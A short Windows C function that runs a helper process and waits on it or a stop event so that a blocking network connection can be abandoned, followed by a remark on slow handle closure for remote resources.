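BOOL add_connection_abortable(const WCHAR *helperCmdLine, HANDLE hStopEvent)
{
    WCHAR cmdline[1024];
    lstrcpynW(cmdline, helperCmdLine, ARRAYSIZE(cmdline));  // CreateProcess wants a writable buffer

    STARTUPINFOW si = { sizeof(si) };
    PROCESS_INFORMATION pi = { 0 };
    if (!CreateProcessW(NULL, cmdline, NULL, NULL, FALSE,
                        CREATE_NO_WINDOW, NULL, NULL, &si, &pi))
        return FALSE;

    // Wait for either the helper to finish or a shutdown request.
    HANDLE waits[2] = { pi.hProcess, hStopEvent };
    if (WaitForMultipleObjects(2, waits, FALSE, INFINITE) != WAIT_OBJECT_0)
        TerminateProcess(pi.hProcess, 1);   // give up waiting; the connection is system-wide anyway

    DWORD exitCode = 1;
    GetExitCodeProcess(pi.hProcess, &exitCode);
    CloseHandle(pi.hThread);
    CloseHandle(pi.hProcess);
    return exitCode == 0;
}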
Sadly, however, certain Windows resources, such as named pipe handles and handles to files open on remote computers, can take about 16 seconds to close following failure or shutdown of a remote machine. CancelSynchronousIo does not seem to help even with those, and will likely add an additional long delay.
